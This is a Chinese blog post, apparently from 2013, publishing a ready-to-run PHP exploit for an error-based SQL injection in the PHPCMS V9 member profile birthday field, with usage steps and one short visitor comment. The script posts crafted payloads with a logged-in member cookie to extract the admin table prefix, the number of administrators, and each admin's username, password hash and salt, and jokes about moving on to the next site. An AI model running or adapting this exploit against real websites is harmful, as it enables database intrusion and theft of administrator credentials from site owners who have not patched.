正在阅读:

PHPCMS V9 info[birthday] 注入EXP

6,572

PHPCMS V9会员中心会员资料修改处未正确处理,导致SQL注入漏洞,最早好像是T00LS上面发的,最后有人转到乌云上面,官方已经修补好了漏洞,请使用此CMS的用户尽快升级。可能很多大牛都有EXP了,但是没有见人发出来。才学php,学着写了个,总有些小问题,希望大牛帮着改进一下。

使用方法:

1、请先注册个会员,登陆得到cookie,填写到cookie变量那里,然后执行就可以了。

2、可能部分人使用得不到数据,请修改一下UserAgent为你自己的即可。

利用代码如下:

<?php
/**
 * Created by 独自等待
 * User: Hack2012
 * Date: 13-2-17 下午7:08
 * FileName: phpcmsv9_info.php
 * 独自等待博客www.waitalone.cn
 */
print_r('
+------------------------------------------------------+
            PHPCMS_V9 info[birthday] 注入EXP
             Site:http://www.waitalone.cn/
                Exploit BY: 独自等待
                  Time:2013-02-17
+------------------------------------------------------+
');
if ($argc < 3) {
    print_r('
+------------------------------------------------------+
Useage: php ' . $argv[0] . ' host path
Host: target server (ip/hostname)
Path: path to phpcms
Example: php ' . $argv[0] . ' localhost /phpcms
+------------------------------------------------------+
    ');
    exit;
}
error_reporting(7);
$host = $argv[1];
$path = $argv[2];
//请先更改cookie
$cookie = 'Zopvm_siteid=Yw%3D%3D; Zopvm_admin_email=ISZUBBoqExIJbBFeIg%3D%3D; Zopvm_sys_lang=KC8fAjQ%3D; Zopvm_admin_username=ISZUBA%3D%3D; Zopvm_userid=YA%3D%3D; IBW_AreaId=0; Zopvm__nickname=JiJBFQ%3D%3D; Zopvm_auth=EwBdKQw1BiY0ExF2DDtqCB5nEHQQAWg7DT40IDkDBmMOGnETEHALYgcWXSIPLk9J; Zopvm__userid=Yw%3D%3D; Zopvm__username=ISZUBA%3D%3D; Zopvm__groupid=YA%3D%3D; bdshare_firstime=1369108099451; PHPSESSID=5ujcv74lgvh9l3qof5gmghhij0';
//统计时间
$start_time = func_time();
$cmd1 = 'nickname=safe&info%5Bbirthday%3D%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28SELECT+distinct+concat%280x23%2Ccount(*)%2C0x23%29+FROM+v9_admin+Order+by+userid+LIMIT+0%2C1%29%29+from+information_schema.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29%5D=2013-02-01&dosubmit=%E6%8F%90%E4%BA%A4';
//echo send_pack($cmd1);exit;
if (preg_match('/MySQL Query/', send_pack($cmd1))) {
    //取得管理员表前缀
    preg_match('/\.`(.*?)_member_detail`/', send_pack($cmd1), $prefix_match);
    $tableadmin = $prefix_match[1] . '_admin';
    //取得管理员个数
    $cmd2 = 'nickname=safe&info%5Bbirthday%3D%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28SELECT+distinct+concat%280x23%2Ccount(*)%2C0x23%29+FROM+' . $tableadmin . '+Order+by+userid+LIMIT+0%2C1%29%29+from+information_schema.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29%5D=2013-02-01&dosubmit=%E6%8F%90%E4%BA%A4';
    preg_match('/\'#(\d+)#1/U', send_pack($cmd2), $num_match);
    $count = $num_match[1];
    echo '共有' . $count . '个管理员' . "\n";
    //取得管理员用户名及数据
    if (preg_match('/Duplicate/', send_pack($cmd2))) {
        foreach (range(0, ($count - 1)) as $i) {
            $payload = 'nickname=test&info%5Bbirthday%3D%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28SELECT+distinct+concat%280x23%2Cusername%2C0x3a%2Cpassword%2C0x3a%2Cencrypt%2C0x23%29+FROM+' . $tableadmin . '+Order+by+userid+LIMIT+' . $i . '%2C1%29%29+from+information_schema.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29%5D=2013-02-08&dosubmit=%E6%8F%90%E4%BA%A4';
            preg_match('/\'#(.*)#1/U', send_pack($payload), $admin_match);
            if (preg_match('/charset=utf-8/', send_pack($payload))) {
                echo $i . '-->' . iconv('utf-8', 'gbk//IGNORE', $admin_match[1]) . "\n";
            } else {
                echo $i . '-->' . $admin_match[1] . "\n";
            }
            //echo $admin_match[1]. "\n";
            //echo iconv('utf-8', 'gbk//IGNORE', $admin_match[1]) . "\n";
            //echo mb_convert_encoding($admin_match[1],'gbk','auto')."\n";
        }
    }
    //使用foreach速度比使用for快
//    if (preg_match('/Duplicate/', send_pack($cmd2))) {
//        for ($i = 0; $i < $count; $i++) {
//            $payload = 'nickname=test&info%5Bbirthday%3D%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28SELECT+distinct+concat%280x23%2Cusername%2C0x3a%2Cpassword%2C0x3a%2Cencrypt%2C0x23%29+FROM+' . $tableadmin . '+Order+by+userid+LIMIT+' . $i . '%2C1%29%29+from+information_schema.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29%5D=2013-02-08&dosubmit=%E6%8F%90%E4%BA%A4';
//            preg_match('/\'#(.*)#1/U', send_pack($payload), $admin_match);
//            if (preg_match('/charset=utf-8/', send_pack($payload))) {
//                echo $i . '-->' . iconv('utf-8', 'gbk//IGNORE', $admin_match[1]) . "\n";
//            } else {
//                echo $i . '-->' . $admin_match[1] . "\n";
//            }
//        }
//    }
} else {
    exit("报告大人,网站不存在此漏洞,你可以继续秒下一个!\n");
}

function send_pack($cmd)
{
    global $host, $path, $cookie;
    $data = "POST " . $path . "/index.php?m=member&c=index&a=account_manage_info&t=1 HTTP/1.1\r\n";
    $data .= "Host: $host\r\n";
    $data .= "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0\r\n";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $data .= "Accept-Language: zh-cn\r\n";
    $data .= "Referer: http://" . $host . $path . "/index.php?m=member&c=index&a=account_manage_info&t=1\r\n";
    $data .= "Cookie: " . $cookie . "\r\n";
    $data .= "Connection: Close\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "Content-Length: " . strlen($cmd) . "\r\n\r\n";
    $data .= $cmd . "\r\n";
    $fp = @fsockopen($host, 80, $errno, $errstr, 30);
    //echo ini_get('default_socket_timeout');//默认超时时间为60秒
    if (!$fp) {
        echo $errno . '-->' . $errstr;
        exit('Could not connect to: ' . $host);
    } else {
        fwrite($fp, $data);
        $back = '';
        while (!feof($fp)) {
            $back .= fread($fp, 1024);
        }
        fclose($fp);
    }
    return $back;
}

//时间统计函数
function func_time()
{
    list($microsec, $sec) = explode(' ', microtime());
    return $microsec + $sec;
}

echo '脚本执行时间:' . round((func_time() - $start_time), 4) . '秒';
?>

phpcms info[birthday]注入

目前有:1条访客评论

  1. skysheep
    2013-05-22 23:53

    挖洞人路过。赞一个

留下脚印,证明你来过。

*

*

流汗坏笑撇嘴大兵流泪发呆抠鼻吓到偷笑得意呲牙亲亲疑问调皮可爱白眼难过愤怒惊讶鼓掌